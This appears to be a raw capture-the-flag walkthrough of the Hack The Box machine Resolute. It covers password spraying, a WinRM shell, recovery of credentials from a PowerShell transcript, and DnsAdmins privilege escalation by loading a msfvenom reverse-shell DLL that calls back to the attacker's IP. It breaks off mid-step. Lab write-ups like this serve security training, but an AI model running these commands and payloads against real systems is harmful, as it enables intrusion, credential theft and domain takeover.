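
if __name__ == "__main__":
    for sam, desc in leaky(parse_ldif(SAMPLE_LDIF)):
        print(f"{sam}: {desc}")
```

Pipe the raw ldapsearch output into parse_ldif instead of awk and the folded and base64 cases are caught along with marko's; a plain grep on "description:" would have missed both constructed entries.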
Trying the password as marko fails over SMB, WinRM and rpcclient:
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u marko -p 'Welcome123!' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 --shares -u marko -p 'Welcome123!'
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u marko -p 'Welcome123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
WINRM 10.10.10.169 5985 RESOLUTE [-] megabank.local\marko:Welcome123!
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ rpcclient 10.10.10.169 -U marko
Password for [WORKGROUP\marko]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Found a typo in my hosts file (megabank.localx instead of megabank.local) and also added resolute.megabank.local:
Before (last line has the typo):
10.10.10.169 megabank.localx
After:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local resolute.megabank.local
Still no luck for marko over SMB or WinRM:
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u marko -p 'Welcome123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
netshareenum over the null rpcclient session is denied:
┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169
rpcclient $> netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Tried nmap's smb-enum-shares script as well; it sat at 0% for minutes with nothing to show:
┌──(kali㉿kali)-[~]
└─$ nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 22:28 EDT
Stats: 0:05:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Since the policy has no lockout threshold, spray Welcome123! against the whole user list over SMB; it fails for everyone until melanie, right at the end:
└─$ crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\RESOLUTE$:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\MS02$:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
crackmapexec winrm shows melanie can log in over WinRM (Pwn3d!), so we connect with evil-winrm and read the user flag:
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/15/2023 7:03 PM 34 user.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
fb18e2daec48bf3f4ff7430139441feb
Checking which shares melanie can read:
└─$ crackmapexec smb 10.10.10.169 -u melanie -p Welcome123! --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares
SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark
SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------
SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.10.10.169 445 RESOLUTE C$ Default share
SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC
SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
Upload winPEAS and run it; nothing glaring at a first glance, will recheck later.
Info: Upload successful!
*Evil-WinRM* PS C:\Users\melanie\Documents> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
[winPEAS banner, advisory and colour legend omitted]
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows
bloodhound-python
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ bloodhound-python -u melanie -p 'Welcome123!' -ns 10.10.10.169 -d megabank.local -c all
INFO: Found AD domain: megabank.local
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 27 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 57S
Also collect with SharpHound from the WinRM shell and download the zip for BloodHound:
*Evil-WinRM* PS C:\Users\melanie\Documents> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 7:57 AM on 9/16/2023
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain MEGABANK.LOCAL using path CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 88 objects finished (+88 ∞)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.4523615
Compressing data to .\20230916075709_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 7:57 AM on 9/16/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\melanie\Documents> ls
Directory: C:\Users\melanie\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/16/2023 7:57 AM 10694 20230916075709_BloodHound.zip
-a---- 9/16/2023 7:57 AM 15793 NGFkZWM1ODktZGZiMS00YWJmLTk0OTMtMTFkMTllMjIxYmUx.bin
-a---- 9/16/2023 7:56 AM 833536 SharpHound.exe
-a---- 9/16/2023 7:39 AM 2387968 winPEASx64.exe
*Evil-WinRM* PS C:\Users\melanie\Documents> download 20230916075709_BloodHound.zip
Info: Downloading C:\Users\melanie\Documents\20230916075709_BloodHound.zip to 20230916075709_BloodHound.zip
Info: Download successful!
tried aclpwn but no luck
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64] └─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Welcome123!' [!] No path found! ┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64] └─$
reviewing winpeas again and saw some hidden directories as
C:\Users\Default C:\Users\DefaultUser C:\Users\Default C:\Users\All Users
ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files Not Found ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow) C:\Users\Default C:\Users\Default User C:\Users\Default C:\Users\All Users ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)
checking all of these folders and we download NTUSER.dat,
*Evil-WinRM* PS C:\Users\Default> ls Directory: C:\Users\Default Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 7/16/2016 6:18 AM Desktop d-r--- 9/25/2019 10:17 AM Documents d-r--- 7/16/2016 6:18 AM Downloads d-r--- 7/16/2016 6:18 AM Favorites d-r--- 7/16/2016 6:18 AM Links d-r--- 7/16/2016 6:18 AM Music d-r--- 7/16/2016 6:18 AM Pictures d----- 7/16/2016 6:18 AM Saved Games d-r--- 7/16/2016 6:18 AM Videos -a---- 12/4/2019 5:17 AM 262144 NTUSER.DAT *Evil-WinRM* PS C:\Users\Default> cd Documents *Evil-WinRM* PS C:\Users\Default\Documents> ls *Evil-WinRM* PS C:\Users\Default\Documents> cd C:\Users\"All Users" *Evil-WinRM* PS C:\Users\All Users> ls Directory: C:\Users\All Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 11/20/2016 6:36 PM Microsoft d----- 9/25/2019 10:48 AM Package Cache d----- 9/25/2019 10:17 AM regid.1991-06.com.microsoft d----- 7/16/2016 6:18 AM SoftwareDistribution d----- 11/20/2016 6:19 PM USOPrivate d----- 11/20/2016 6:19 PM USOShared d----- 9/25/2019 10:48 AM VMware *Evil-WinRM* PS C:\Users\All Users> cd VMware *Evil-WinRM* PS C:\Users\All Users\VMware> ls Directory: C:\Users\All Users\VMware Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/25/2019 10:48 AM VMware CAF d----- 9/25/2019 10:49 AM VMware Tools d----- 9/25/2019 10:48 AM VMware VGAuth *Evil-WinRM* PS C:\Users\All Users\VMware> cd ---- ------------- ------ ---- ^C Warning: Press "y" to exit, press any other key to continue *Evil-WinRM* PS C:\Users\All Users\VMware> cd C:\Users\"Default User" *Evil-WinRM* PS C:\Users\Default User> ls Access to the path 'C:\Users\Default User' is denied. At line:1 char:1 + ls + ~~ + CategoryInfo : PermissionDenied: (C:\Users\Default User:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand *Evil-WinRM* PS C:\Users\Default User>
wild goose chase with trying to enumerate NTUSER.DAT.. so gave up after trying
┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins] └─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser Parsed Plugins file. Error in : Can't locate plugins/.pl in @INC (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl line 199. complete. ---------------------------------------- ┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins] └─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser
Viewing hidden files via the powershell commands. We run it in C:/
Get-ChildItem -Hidden or gci -Hidden ls -a
*Evil-WinRM* PS C:\> Get-ChildItem -Hidden Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 9/16/2023 7:41 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 9/16/2023 7:31 AM 402653184 pagefile.sys *Evil-WinRM* PS C:\>
we check inside PSTranscripts but there is nothing so we check for hidden files here and we find one which i download to kal
which also contains nothing so we also check hidden files here and we find "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt"*Evil-WinRM* PS C:\> cd PSTranscripts *Evil-WinRM* PS C:\PSTranscripts> ls *Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Hidden Directory: C:\PSTranscripts Mode LastWriteTime Length Name ---- ------------- ------ ---- d--h-- 12/3/2019 6:45 AM 20191203 *Evil-WinRM* PS C:\PSTranscripts> *Evil-WinRM* PS C:\PSTranscripts> download 20191203 Info: Downloading C:\PSTranscripts\20191203 to 20191203 Info: Download successful! *Evil-WinRM* PS C:\PSTranscripts> Directory: C:\PSTranscripts\20191203 Mode LastWriteTime Length Name ---- ------------- ------ ---- -arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt *Evil-WinRM* PS C:\PSTranscripts\20191203> download PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError rescue EstandardError => err ^^^^^^^^^^^^^^ Did you mean? StandardError *Evil-WinRM* PS C:\PSTranscripts\20191203> download "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt" Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError rescue EstandardError => err ^^^^^^^^^^^^^^ Did you mean? StandardError *Evil-WinRM* PS C:\PSTranscripts\20191203> cat powerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt **********************
we find some password for ryan Serv3r4Admin4cc123!
PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 **********************
``
enumerate ryan┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!" dquote> ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!) ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! --shares SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!) SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------ SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin SMB 10.10.10.169 445 RESOLUTE C$ Default share SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
tried aclpwn again
┌──(kali㉿kali)-[~] └─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Serv3r4Admin4cc123!' [!] No path found! ┌──(kali㉿kali)-[~] └─$
group membership - *Domain Users *Contractors
*Evil-WinRM* PS C:\Users\ryan\Documents> net user /domain ryan User name ryan Full Name Ryan Bertrand Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 9/16/2023 9:27:02 AM Password expires Never Password changeable 9/17/2023 9:27:02 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *Contractors The command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
check more information using whoami /all . Noted that this gives more infor.we can see DNSadmin
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all USER INFORMATION ---------------- User Name SID ============= ============================================== megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Found some instructions to exploit as DNSadmin
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll > malicious.dll Upload to the machine run the following command to reconfigure the DNS dnscmd <ServerName> /config /serverlevelplugindll <Path_to_malicious_DLL> restart the DNS service net stop "DNS Server" net start "DNS Server" This may not work in evil-winrm so better to do via reverse shell
steps
┌──(kali㉿kali)-[~/HTB/resolute] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > malicious.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute] └─$ nc -nlvp 444 listening on [any] 444 ...
on kali
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
Tried to restart DNS but failed due to permisions
*Evil-WinRM* PS C:\Users\ryan\Documents> Restart-Service -Name 'DNS Server' 'Cannot access dependent services of 'DNS Server (DNS)' At line:1 char:1 + Restart-Service -Name 'DNS Server' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException + FullyQualifiedErrorId : CouldNotAccessDependentServices,Microsoft.PowerShell.Commands.RestartServiceCommand Service 'DNS Server (DNS)' cannot be stopped due to the following error: Cannot open DNS service on computer '.'. At line:1 char:1 + Restart-Service -Name 'DNS Server' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll
Read that this may be an issue with evil-winrm. Will try do a reverse so i can run from my computer
setting up and running the reverse shell
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: shell.exe ┌──(kali㉿kali)-[~/HTB/resolute]
Warning: Press "y" to exit, press any other key to continue *Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell.exe Info: Uploading /home/kali/HTB/resolute/shell.exe to C:\Users\ryan\Documents\shell.exe Data: 9556 bytes of 9556 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe
exe failed
*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe Program 'shell.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1 + ./shell.exe + ~~~~~~~~~~~. At line:1 char:1 + ./shell.exe + ~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException + FullyQualifiedErrorId : NativeCommandFailed *Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell2.exe
will try dll but kept failing
Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe path\to\shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe ./shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> pwd Path ---- C:\Users\ryan\Documents *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe C:\Users\ryan\Documents\shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents>
I found a way to restart the dns via -- sc.exe
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x4e20 PID : 3308 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
Aftert research, found that the dll we create will not work and we need t o create one that is
windows/x64/exec
module1. You'll use the `windows/x64/exec` payload with the `CMD` option to run your desired command upon successful exploitation. If you wish to run a reverse shell, you can leverage something like `nc.exe` (netcat). 2. The following command will generate a DLL that, when loaded, will execute the specified command (in this case, a reverse shell using netcat):
